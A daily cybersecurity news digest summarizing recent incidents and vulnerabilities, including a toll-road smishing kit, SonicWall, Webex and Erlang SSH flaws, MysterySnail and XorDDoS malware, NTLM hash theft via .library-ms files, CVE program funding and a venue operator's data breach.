Daily Brief

Cybersecurity experts have identified an extensive SMS phishing (smishing) campaign exploiting toll road users across eight U.S. states for financial gain. The campaign utilizes a smishing kit created by a person known as "Wang Duo Yu," marketed as part of a China-based service called Lighthouse. Fraudulent messages mimic U.S. toll collection systems like E-ZPass, directing victims to enter personal details on spoofed websites. Victims are deceived into enabling links via SMS, then face a fake CAPTCHA followed by requests for financial information on counterfeit payment pages. Analysis reveals that smishing kit affiliations extend to a group termed Smishing Triad, which conducts large-scale international scams involving postal service impersonations. The smishing kits are not only used for theft but also come with a "double theft" feature where stolen credit/debit card information is exfiltrated back to the creators. There is a growing concern as Wang Duo Yu’s kits are now targeting banks and financial institutions in the Asia-Pacific region, escalating global cybersecurity risks. The campaign's scale and complexity, supported by a vast infrastructure and human resources, challenge effective preventive measures by tech giants like Apple and Google.

SonicWall SMA VPN appliances have been under attack since January 2025, exploiting a vulnerability identified as CVE-2021-20035. Initially believed to only cause denial-of-service attacks, the flaw now allows remote code execution with an updated CVSS score of 7.2. Arctic Wolf reported that hackers used exploits targeting the SonicWall SMA 100 series, compromising devices with default super admin passwords. The compromised devices include multiple models such as SMA 200, SMA 210, SMA 400, SMA 410, and SMA 500v. CISA has acknowledged the threat by adding the vulnerability to its Known Exploited Vulnerabilities catalog and mandated federal agencies to secure their networks immediately. Arctic Wolf recommends limiting VPN access, deactivating unnecessary accounts, enforcing multi-factor authentication, and resetting local account passwords to combat the threat. Additional guidance was issued by SonicWall to patch another critical vulnerability in SMA1000 secure access gateways and address a bypass flaw in Gen 6 and Gen 7 firewalls.

Credential-based attacks are the preferred method for cybercriminals, exploiting weak or stolen credentials to bypass security systems without detection. Google Cloud and IBM X-Force report high instances of cloud breaches and cyberattacks due to compromised accounts, affecting roughly one-third of global incidents. It's crucial for organizations to adopt strong password policies, implement multi-factor authentication, conduct regular staff training, and audit their Active Directory frequently to minimize vulnerabilities. Continuous monitoring and updating of Active Directory with tools like Specops Password Policy can prevent future breaches by detecting and addressing compromised passwords across the network. An immediate, well-rehearsed incident response plan is vital for minimizing damage and recovery time following a credential-based attack. Traditional security measures should be complemented with proactive strategies such as scanning for compromised passwords to effectively shield organizations from potential cyber threats. Specops Software’s Password Policy helps organizations by blocking access with known compromised passwords and promoting the creation of secure credentials.

Chinese-speaking IronHusky hackers have targeted government entities in Russia and Mongolia using upgraded MysterySnail RAT malware. The RAT was spread through a malicious MMC script pretending to be a Word document, facilitating the download of secondary payloads for persistence on affected systems. An intermediary backdoor discovered in the attacks allows file transfers, command execution, process management, and file deletion between the compromised devices and attackers' servers. Kaspersky experts noted that after initial defense measures blocked the attacks, the hackers deployed a simplified, more efficient version of the RAT dubbed MysteryMonoSnail. The updated RAT version supports extensive command functionalities, enhancing hackers' control over compromised systems. Originally detected in 2017, the IronHusky group has a history of espionage focused on military and diplomatic intelligence concerning Russian and Mongolian affairs. The latest findings and technical details of the ongoing cyber-espionage campaign have been documented in a recent Kaspersky report, including indicators of compromise.

Credential-based attacks, where valid credentials are used by cybercriminals, account for nearly one-third of global cyberattacks and facilitate 47% of cloud breaches. These attacks often occur due to weak or non-existent protection of credentials, making organizations with these security gaps prime targets. Immediate steps for responding to such attacks include multi-factor authentication, strong password policies, regular staff training, and frequent audits. It's crucial to implement security strategies like scanning Active Directories for compromised passwords, which can prevent future breaches. Specops Password Policy aids in protecting against credential-based breaches by blocking compromised passwords and promoting the creation of secure ones. Regular monitoring and updating of security measures are recommended to keep ahead of cybercriminals and minimize potential damages from attacks. The real-time example highlights the urgency and potential damage of such attacks, illustrating the importance of preparedness and rapid response.

Cisco has issued updates for a critical vulnerability in Webex, identified as CVE-2025-20336, which permits unauthenticated remote code execution through malicious meeting links. The flaw stems from insufficient validation of inputs in Webex’s custom URL parser, allowing attackers to trick users into downloading dangerous files to execute commands. Attackers can exploit this by persuading a user to click a specially crafted meeting invite link, leading to arbitrary command execution under user privileges. This vulnerability affects all Cisco Webex App installations across different operating systems with no available workaround; updating the software is essential to mitigate risks. Cisco also patched other security issues, including a privilege escalation in Secure Network Analytics and user enumeration vulnerability in Nexus Dashboard. Despite these vulnerabilities, Cisco's security team has not found any active exploitation or evidence of these vulnerabilities being targeted in the wild. Additionally, a previously disclosed Cisco vulnerability (CVE-2024-20439) has been actively exploited, prompting urgent update recommendations from CISA for U.S. federal network security.

A multi-stage malware campaign distributing families like Agent Tesla, Remcos RAT, and XLoader has been observed. Attack uses a phishing email with a 7-Zip archive containing a .JSE file to initiate the infection sequence. The .JSE script downloads a PowerShell script that decodes and executes a Base64-encoded payload, leading to further malware deployment stages. Multiple execution paths are utilized, including .NET and AutoIt compiled executables, to increase attack resilience and complicate analysis. Techniques involve code injection into processes like "RegAsm.exe" and "RegSvcs.exe" to deploy payloads such as Agent Tesla. Additionally, a separate campaign by IronHusky targeted government organizations in Mongolia and Russia with a newly versioned MysterySnail RAT. IronHusky’s campaign likely used phishing with a malicious MMC script mimicking official documents to distribute the malware. Kaspersky reported proactive measures by affected companies led to a simpler, less capable version of MysterySnail, dubbed MysteryMonoSnail, being deployed.

The CVE (Common Vulnerabilities and Exposures) program, operated by MITRE, faced potential shutdown due to a sudden halt in US government funding, although last-minute government action extended funding by 11 months. Concurrently, the European Union has launched its own vulnerability tracking system, the EUVD (European Union Vulnerability Database), under the administration of ENISA, aimed at enhancing self-sustainability in vulnerability management within Europe. The EUVD utilizes a mix of its own IDs, alongside CVE IDs and GSD IDs from the potentially defunct Global Security Database, to track vulnerabilities. This development could lead to a fragmentation in how security vulnerabilities are tracked globally, with potential implications for how vulnerabilities are managed and reported across different regions. Industry experts express concerns regarding dependency on single government entities for funding and the neutrality of such programs, suggesting that a multi-nationally backed system might avoid impartiality issues. Discussions are also arising around whether regional systems like the EUVD will become favored over global systems due to regional regulatory influences. New initiatives such as the CVE Foundation and the GCVE (Global CVE Allocation System) are being explored to provide more robust and decentralized approaches to vulnerability management. The continued evolution of vulnerability tracking systems highlights the importance of a standardized approach to ensure coherence and reliability in managing security vulnerabilities globally.

AI tools have spontaneously integrated into SaaS environments, often bypassing existing security measures. Employees are using AI for efficiency, such as summarizing deals or integrating chatbots, without recognizing potential data exposure risks. These AI enhancements are creating "shadow integrations" in SaaS stacks that are not easily visible to security teams. Traditional security strategies, reliant on manual tracking or user education, are insufficient to address these emerging threats. The session led by Dvir Sasson at Reco will focus on adapting security tactics to manage AI's expanding role in operational frameworks. Addressing AI security readiness is crucial, as traditional approaches do not fully cover the increased risks in decentralized, dynamic SaaS applications. Security professionals are encouraged to be proactive in evolving their strategies to include AI-specific considerations and potential vulnerabilities.

XorDDoS malware is increasingly targeting the United States, accounting for 71.3% of observed attacks between November 2023 and February 2025. The malware, which has been active for over a decade, has broadened its scope to include Docker servers and IoT devices, converting infected systems into bots. Common initial access methods include SSH brute-force attacks, with the malware installing itself on vulnerable devices. XorDDoS establishes persistence on infected machines using initialization scripts and cron jobs, ensuring it reactivates at system startup. The malware decrypts internal configurations using the XOR key to facilitate command and control (C2) communications. Cisco Talos researchers in 2024 identified an updated architecture for XorDDoS, including a new VIP version sub-controller that manages an extensive botnet and potentially indicates commercial distribution. Language settings in the XorDDoS system hint at Chinese-speaking operators. Besides DDoS capabilities, the infections also pave the way for secondary payloads like cryptocurrency mining malware.

CISA has documented a medium-severity vulnerability in Microsoft Windows, CVE-2025-24054, which is being actively exploited to steal NTLM credentials. Microsoft patched this hash disclosure spoofing bug recently, despite NTLM being a deprecated authentication protocol. The vulnerability allows attackers to manipulate file interactions, such as selecting or inspecting without opening, to compromise systems. Attackers have used phishing and malicious files distributed via Dropbox to exploit this flaw and extract NTLM hashes, primarily targeting institutions in Poland and Romania. Check Point reports multiple phishing campaigns using malicious .library-ms files to harvest NTLMv2-SSP hashes and enable lateral movements within networks. Despite being rated as "Exploitation Less Likely" by Microsoft, this flaw has been weaponized rapidly, prompting urgent recommendations for patch implementation. FCEB agencies have a compliance obligation to fix this vulnerability by May 8, 2025, in response to these security breaches.

A critical flaw, CVE-2025-32433, in Erlang/OTP SSH allows unauthenticated remote code execution. The vulnerability was identified by researchers from Ruhr University Bochum in Germany, receiving a severity score of 10.0. Vulnerable systems include all devices operating the Erlang/OTP SSH daemon, with urgent updates advised. Erlang's widespread use in telecom and high-availability systems highlights the significant impact of this vulnerability. The flaw arises from incorrect handling of pre-authentication protocol messages in the SSH daemon. Attackers exploiting this vulnerability can execute commands with the same privileges as the SSH daemon, often with root access. Horizon3's Attack Team demonstrated a "surprisingly easy" proof of concept, emphasizing the urgency of applying patches. For systems that cannot be immediately updated, restricting SSH access or disabling the SSH daemon is recommended.

Legends International disclosed a data breach impacting its employees and venue visitors detected on November 9, 2024. The breach involved unauthorized activity in the IT systems, with personal data files confirmed to be exfiltrated. The exact types of exposed personal data are not yet determined, and the total number of affected individuals remains unknown. Legends manages over 350 venues globally, including prominent locations such as SoFi Stadium and One World Observatory. An investigation with external cybersecurity experts is ongoing, and enhanced security measures have been implemented post-incident. Affected individuals have been offered 24-month identity theft detection services through Experian with a July 2025 enrollment deadline. Despite the implementation of previous and new security measures, specific details regarding these protections have not been disclosed. There is currently no evidence that the exfiltrated data has been misused, and no ransomware group has claimed responsibility for the attack.

Windows vulnerability CVE-2025-24054, fixed in March 2025, is actively exploited via phishing, targeting governments and corporations. Hackers use .library-ms files in emails to trigger automatic SMB connections that leak Windows NTLM authentication hashes. Initially assessed as 'less likely' to be exploited, the flaw was confirmed used in attacks shortly after patch release. Phishing campaigns involved sending Dropbox links containing malicious .library-ms files to entities in Poland and Romania. In subsequent attacks, simply downloading a .library-ms file triggered the flaw, demonstrating a broader exploitation technique beyond zip archives. The attackers' IP was previously associated with Russian state-sponsored group APT28, though there isn't enough evidence for definite attribution. Captured NTLM hashes potentially allow for severe security breaches including authentication bypass and privilege escalation. Microsoft recommends installing the latest updates and disabling NTLM authentication to mitigate risks.

Chris Krebs, ex-head of the US Cybersecurity and Infrastructure Security Agency (CISA), resigned from cybersecurity firm SentinelOne. President Trump issued an executive order revoking Krebs's and associated entities' security clearances, citing Krebs's denial of 2020 election fraud. The order also demands an investigation into Krebs's assurances of the 2020 election's security by the Attorney General and the Department of Homeland Security. Krebs joined SentinelOne in 2023 after his consultancy was acquired; the company was not involved in his activities during his tenure at CISA. Krebs stated his resignation was necessary to focus on fighting for democracy, freedom of speech, and the rule of law independently. Krebs publicly stated that the 2020 presidential election was secure, contrary to unfounded claims of widespread election malfeasance.